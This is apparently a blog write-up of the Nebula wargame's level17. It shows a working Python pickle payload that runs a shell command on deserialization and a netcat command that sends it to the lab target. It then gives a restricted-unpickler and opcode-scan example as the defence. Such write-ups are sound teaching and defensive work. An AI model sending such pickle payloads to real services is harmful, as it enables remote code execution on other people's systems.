Friday, November 2, 2012

exploit-exercises Nebula: level17

In level17 of the Nebula wargame, we have a Python script. The type of vulnerability should be obvious as soon as we see "import pickle".

Pickle is an object serialization module for Python. It has always been known to be insecure, since there are no restrictions on the objects that are deserialized: a pickle stream can name any importable callable and have it invoked with attacker-chosen arguments. There was a great presentation at Blackhat 2011 about Python shellcoding from SensePost. Here is the payload we will be using:

[email protected]:~$ cat pwn17
cos
system
(S'getflag > /tmp/pwnie17'
tR.
which, when deserialized, is equivalent to os.system("getflag > /tmp/pwnie17"). We will send the exploit with netcat:
[email protected]:~$ nc 192.168.56.101 10007 < pwn17
[email protected]:~$ cat /tmp/pwnie17

You have successfully executed getflag on a target account
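The fix on the defending side is never to hand untrusted bytes to the stock loader. The following is an added example, not code from the level or from the Nebula authors: it carries a constructed copy of the same opcode stream shown above, lists the globals a stream would import without loading it (via pickletools), and rejects the stream with a restricted Unpickler whose find_class only resolves an allow-list. The allow-list contents, the benign sample dict and the function names are assumptions for the demonstration.

```python
import io
import pickle
import pickletools

# Constructed copy of the level's payload (same opcodes as the pwn17 file shown on
# the page): 'c' GLOBAL os.system, '(' MARK, 'S' STRING arg, 't' TUPLE, 'R' REDUCE.
UNTRUSTED_PAYLOAD = b"cos\nsystem\n(S'getflag > /tmp/pwnie17'\ntR."

# Assumed allow-list of (module, name) pairs the application legitimately needs.
SAFE_GLOBALS = {("builtins", "set"), ("collections", "OrderedDict")}


def referenced_globals(data: bytes) -> list:
    """Statically list the globals a pickle would import, without executing it.

    Protocol 4 STACK_GLOBAL takes its names from the stack, so this static scan only
    covers the text-form GLOBAL opcode ('c') that the protocol 0 payload above uses.
    """
    found = []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            found.append(arg.replace(" ", "."))  # arg is "module name"
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse to resolve any global that is not on the allow-list."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads that consults the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def classify(data: bytes) -> str:
    """Return 'rejected' if loading hits a forbidden global, else 'accepted'."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return "rejected"
    return "accepted"


def benign_sample() -> bytes:
    """A constructed, harmless pickle: a plain dict needs no GLOBAL at all."""
    return pickle.dumps({"user": "level17", "score": 3})


if __name__ == "__main__":
    print("globals referenced:", referenced_globals(UNTRUSTED_PAYLOAD))
    print("payload:", classify(UNTRUSTED_PAYLOAD))
    print("benign:", classify(benign_sample()))
```

The restricted loader stops at the very first opcode of the payload, before any argument string is even read, because GLOBAL is resolved through find_class. The static scan is useful as a logging or alerting check in front of the loader, but only the allow-list enforces anything; where the data format allows it, replacing pickle with JSON removes the problem entirely.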
